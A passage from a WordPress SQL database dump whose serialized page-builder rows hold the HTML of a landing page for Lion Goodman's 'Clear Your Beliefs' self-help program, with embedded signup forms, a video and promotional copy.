Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1182, 1664, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:947:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 36px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 54px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1181, 1663, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1024:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 32px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 54px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 10px;">     </p>\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1183, 1665, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:946:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 46px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2842:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman<br /></strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve 